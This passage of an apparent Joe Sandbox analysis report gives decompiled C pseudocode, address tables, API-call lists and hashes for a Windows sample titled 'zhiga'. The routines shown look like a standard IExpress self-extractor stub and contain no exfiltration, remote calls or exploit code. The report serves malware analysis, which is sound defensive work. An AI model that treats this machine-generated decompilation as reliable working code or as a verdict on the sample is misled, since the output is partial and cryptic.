                                                                        				goto L2;
                                                                        			}






                                                                        0x00a33a46
                                                                        0x00a33a57
                                                                        0x00a33a5d
                                                                        0x00a33a63
                                                                        0x00a33a6a
                                                                        0x00a33a91
                                                                        0x00a33a9a
                                                                        0x00a33ad8
                                                                        0x00a33b13
                                                                        0x00a33b19
                                                                        0x00a33b1b
                                                                        0x00000000
                                                                        0x00a33b21
                                                                        0x00a33ae7
                                                                        0x00a33af4
                                                                        0x00a33afc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33afe
                                                                        0x00a33a87
                                                                        0x00000000
                                                                        0x00a33a87
                                                                        0x00a33aa8
                                                                        0x00a33ab3
                                                                        0x00a33ab9
                                                                        0x00000000
                                                                        0x00a33ab9
                                                                        0x00a33a78
                                                                        0x00a33a82
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346A0
                                                                          • Part of subcall function 00A3468F: SizeofResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346A9
                                                                          • Part of subcall function 00A3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A346C3
                                                                          • Part of subcall function 00A3468F: LoadResource.KERNEL32(00000000,00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346CC
                                                                          • Part of subcall function 00A3468F: LockResource.KERNEL32(00000000,?,00A32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346D3
                                                                          • Part of subcall function 00A3468F: memcpy_s.MSVCRT ref: 00A346E5
                                                                          • Part of subcall function 00A3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A346EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A32F64,?,00000002,00000000), ref: 00A33A5D
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A33AB3
                                                                          • Part of subcall function 00A344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A34518
                                                                          • Part of subcall function 00A344B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00A34554
                                                                          • Part of subcall function 00A36285: GetLastError.KERNEL32(00A35BBC), ref: 00A36285
                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A33AD0
                                                                        • LocalFree.KERNEL32 ref: 00A33B13
                                                                          • Part of subcall function 00A36517: FindResourceA.KERNEL32(00A30000,000007D6,00000005), ref: 00A3652A
                                                                          • Part of subcall function 00A36517: LoadResource.KERNEL32(00A30000,00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A36538
                                                                          • Part of subcall function 00A36517: DialogBoxIndirectParamA.USER32(00A30000,00000000,00000547,00A319E0,00000000), ref: 00A36557
                                                                          • Part of subcall function 00A36517: FreeResource.KERNEL32(00000000,?,?,00A32EE8,00000000,00A319E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A36560
                                                                        • LocalFree.KERNEL32(00000000,00A33100,00000000,00000000), ref: 00A33AF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                        • String ID: <None>$LICENSE
                                                                        • API String ID: 2414642746-383193767
                                                                        • Opcode ID: 51b406b0b747f89763896a9a02abac47bca2d112b82ca740ab4b6a2d6e8b87d5
                                                                        • Instruction ID: 314fa9d740ce95224728581221c303ae6da40cf7b4e590060b1631b9755e9901
                                                                        • Opcode Fuzzy Hash: 51b406b0b747f89763896a9a02abac47bca2d112b82ca740ab4b6a2d6e8b87d5
                                                                        • Instruction Fuzzy Hash: 9E11EC317042117BDB24DFB2AD0AE1779BDDBE9B40F10453EB581E61A0DFBD88029620
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00A324E0(void* __ebx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t7;
                                                                        				void* _t20;
                                                                        				long _t26;
                                                                        				signed int _t27;
                                                                        
                                                                        				_t20 = __ebx;
                                                                        				_t7 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t7 ^ _t27;
                                                                        				_t25 = 0x104;
                                                                        				_t26 = 0;
                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                        					E00A3658A( &_v268, 0x104, "wininit.ini");
                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                        					if(_t25 != 0xffffffff) {
                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                        						_lclose(_t25);
                                                                        					}
                                                                        				}
                                                                        				return E00A36CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                        			}











                                                                        0x00a324e0
                                                                        0x00a324eb
                                                                        0x00a324f2
                                                                        0x00a324f7
                                                                        0x00a32504
                                                                        0x00a3250e
                                                                        0x00a3251d
                                                                        0x00a3252c
                                                                        0x00a32541
                                                                        0x00a32546
                                                                        0x00a32553
                                                                        0x00a32555
                                                                        0x00a32555
                                                                        0x00a32546
                                                                        0x00a3256c

                                                                        APIs
                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A32506
                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A3252C
                                                                        • _lopen.KERNEL32(?,00000040), ref: 00A3253B
                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A3254C
                                                                        • _lclose.KERNEL32(00000000), ref: 00A32555
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: ce28762b34c26015e3c36914a7e44b5ae193a2a869fd970663750a5075090f2b
                                                                        • Instruction ID: 7458fcf527c7879fccd4a81f1122f076ee6270c30ae781b65f4c24b1cdf98920
                                                                        • Opcode Fuzzy Hash: ce28762b34c26015e3c36914a7e44b5ae193a2a869fd970663750a5075090f2b
                                                                        • Instruction Fuzzy Hash: 390171326001286BC724DBA59D0DEDFBBBCEB96761F000165FA89D3190DE748E46CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00A336EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0xa38184 = 1;
                                                                        						 *0xa38180 = 1;
                                                                        						L13:
                                                                        						 *0xa39a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0xa38a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E00A32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E00A32A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0xa38a38 & 0x00000001;
                                                                        											if(( *0xa38a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("zhiga");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E00A3681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "zhiga", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E00A367C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E00A328E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0xa39a40 = _t119;
                                                                        						 *0xa38184 = 1;
                                                                        						 *0xa38180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0xa39a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0xa38184 = _t135;
                                                                        							 *0xa38180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E00A344B9(0, _t138);
                                                                        					L66:
                                                                        					return E00A36CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}





































                                                                        0x00a336f9
                                                                        0x00a33700
                                                                        0x00a3370c
                                                                        0x00a33716
                                                                        0x00a33718
                                                                        0x00a3371b
                                                                        0x00a33721
                                                                        0x00a3372b
                                                                        0x00a3373d
                                                                        0x00a33745
                                                                        0x00a33746
                                                                        0x00a33746
                                                                        0x00a33749
                                                                        0x00a337ab
                                                                        0x00a337ad
                                                                        0x00a337ae
                                                                        0x00a337b3
                                                                        0x00a337b8
                                                                        0x00a337b8
                                                                        0x00a337bf
                                                                        0x00a337bf
                                                                        0x00a337c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a337cb
                                                                        0x00a337cd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a337d5
                                                                        0x00a337db
                                                                        0x00a337e8
                                                                        0x00a337ea
                                                                        0x00a337ea
                                                                        0x00a337ea
                                                                        0x00a337f0
                                                                        0x00a337f6
                                                                        0x00a33805
                                                                        0x00a33817
                                                                        0x00a3382b
                                                                        0x00a33830
                                                                        0x00a33836
                                                                        0x00a3383b
                                                                        0x00a3383d
                                                                        0x00a338eb
                                                                        0x00a338eb
                                                                        0x00a338f2
                                                                        0x00a3390c
                                                                        0x00a33911
                                                                        0x00a33911
                                                                        0x00a33913
                                                                        0x00a3394d
                                                                        0x00a3394d
                                                                        0x00a3394f
                                                                        0x00a338a9
                                                                        0x00a338a9
                                                                        0x00a338b0
                                                                        0x00a338b2
                                                                        0x00a338b9
                                                                        0x00a338bb
                                                                        0x00a338c1
                                                                        0x00a33975
                                                                        0x00a338c7
                                                                        0x00a338de
                                                                        0x00a338e0
                                                                        0x00a338e0
                                                                        0x00a3397b
                                                                        0x00a3397d
                                                                        0x00a339a9
                                                                        0x00a3397f
                                                                        0x00a33982
                                                                        0x00a3398b
                                                                        0x00a3398d
                                                                        0x00a3398f
                                                                        0x00a3399f
                                                                        0x00a339a1
                                                                        0x00a33991
                                                                        0x00a33991
                                                                        0x00a33991
                                                                        0x00a3398f
                                                                        0x00a339af
                                                                        0x00a339b6
                                                                        0x00a33a0f
                                                                        0x00a33a0f
                                                                        0x00a33a11
                                                                        0x00a33a13
                                                                        0x00a33a19
                                                                        0x00000000
                                                                        0x00a339b8
                                                                        0x00a339b8
                                                                        0x00a339ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a339bc
                                                                        0x00a339bf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a339c3
                                                                        0x00a339c9
                                                                        0x00a339ce
                                                                        0x00a339d0
                                                                        0x00a339e3
                                                                        0x00a339e5
                                                                        0x00a339e6
                                                                        0x00a339f1
                                                                        0x00a339f7
                                                                        0x00a339fa
                                                                        0x00a33a01
                                                                        0x00a33a04
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33a06
                                                                        0x00a33a09
                                                                        0x00a33a09
                                                                        0x00a33a0b
                                                                        0x00a33a0b
                                                                        0x00000000
                                                                        0x00a33a09
                                                                        0x00a339fc
                                                                        0x00000000
                                                                        0x00a339fc
                                                                        0x00a339d3
                                                                        0x00a339d8
                                                                        0x00a339da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a339dc
                                                                        0x00a339b6
                                                                        0x00a33955
                                                                        0x00a3395b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33961
                                                                        0x00a33963
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33969
                                                                        0x00a33969
                                                                        0x00000000
                                                                        0x00a33969
                                                                        0x00a33915
                                                                        0x00a33915
                                                                        0x00a3391b
                                                                        0x00a3391f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3392d
                                                                        0x00a33933
                                                                        0x00a33938
                                                                        0x00a3393a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33940
                                                                        0x00a33946
                                                                        0x00a3394b
                                                                        0x00000000
                                                                        0x00a3394b
                                                                        0x00000000
                                                                        0x00a338f2
                                                                        0x00a33843
                                                                        0x00a33845
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3384b
                                                                        0x00a3384d
                                                                        0x00a33883
                                                                        0x00a33885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3389a
                                                                        0x00a3389e
                                                                        0x00a3389e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a338a0
                                                                        0x00a338a0
                                                                        0x00a338a2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a338a4
                                                                        0x00000000
                                                                        0x00a338a4
                                                                        0x00a3384f
                                                                        0x00a33851
                                                                        0x00a33857
                                                                        0x00a3386e
                                                                        0x00a33877
                                                                        0x00a3387b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33881
                                                                        0x00a33859
                                                                        0x00a3385c
                                                                        0x00a33862
                                                                        0x00a33866
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33868
                                                                        0x00000000
                                                                        0x00a338f4
                                                                        0x00a338f4
                                                                        0x00a338f5
                                                                        0x00a338fb
                                                                        0x00a33901
                                                                        0x00a33901
                                                                        0x00000000
                                                                        0x00a3390a
                                                                        0x00a3374b
                                                                        0x00a3374e
                                                                        0x00a3375c
                                                                        0x00a33764
                                                                        0x00a33769
                                                                        0x00a3376e
                                                                        0x00a33771
                                                                        0x00a3379c
                                                                        0x00a3379f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a337a3
                                                                        0x00a337a4
                                                                        0x00000000
                                                                        0x00a337a4
                                                                        0x00a33773
                                                                        0x00a33777
                                                                        0x00a33778
                                                                        0x00a3377f
                                                                        0x00a33781
                                                                        0x00a3378e
                                                                        0x00a3378e
                                                                        0x00a33794
                                                                        0x00000000
                                                                        0x00a33794
                                                                        0x00a33783
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a33785
                                                                        0x00a3378c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00a3378c
                                                                        0x00a33750
                                                                        0x00000000
                                                                        0x00a3372d
                                                                        0x00a3372d
                                                                        0x00a3396b
                                                                        0x00a3396b
                                                                        0x00a3396c
                                                                        0x00a3396e
                                                                        0x00a3396f
                                                                        0x00a33a1e
                                                                        0x00a33a1e
                                                                        0x00a33a22
                                                                        0x00a33a27
                                                                        0x00a33a3e
                                                                        0x00a33a3e

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A33723
                                                                        • MessageBeep.USER32(00000000), ref: 00A339C3
                                                                        • MessageBoxA.USER32(00000000,00000000,zhiga,00000030), ref: 00A339F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$zhiga
                                                                        • API String ID: 2519184315-2183486482
                                                                        • Opcode ID: 829d40137bb1fc5534882299f31e338badf55c22203f852c036142d259d4cd53
                                                                        • Instruction ID: 22bcec59d7ccd00eaf3f9d6d5ea68f6caade5d32632fc74dfdae7d15e3cd87e4
                                                                        • Opcode Fuzzy Hash: 829d40137bb1fc5534882299f31e338badf55c22203f852c036142d259d4cd53
                                                                        • Instruction Fuzzy Hash: 04911272E092249FEF34CB25CD91BAAB7B0AF45340F1541A9F889EB251DB718F81CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E00A36495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0xa38004; // 0xb6b6972c
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E00A31781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E00A3658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E00A36CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}













                                                                        0x00a36495
                                                                        0x00a36495
                                                                        0x00a364a0
                                                                        0x00a364a7
                                                                        0x00a364ab
                                                                        0x00a364bd
                                                                        0x00a364c2
                                                                        0x00a364d3
                                                                        0x00a364df
                                                                        0x00a364e8
                                                                        0x00a36502
                                                                        0x00a364ee
                                                                        0x00a364f9
                                                                        0x00a364f9
                                                                        0x00a36516

                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A364DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A364F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00A36502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.396615809.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                                                        • Associated: 00000000.00000002.396538956.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396668507.0000000000A38000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.396683272.0000000000A3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                        • API String ID: 438848745-726598030
                                                                        • Opcode ID: e7ae2a6dccf75341262448d64a9903ac7ad3e7e1a9cb4744b9722357e2fee70a
                                                                        • Instruction ID: c5dc7c6c87150e8f5e6849cc72b37b3bb7fea438c850c1764bca6bd985832f34
                                                                        • Opcode Fuzzy Hash: e7ae2a6dccf75341262448d64a9903ac7ad3e7e1a9cb4744b9722357e2fee70a
                                                                        • Instruction Fuzzy Hash: CC01F470A00108BBDB54DBA4DC49EEEB778EB61311F5002A9F5C5921D0DFB09E8ACA51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
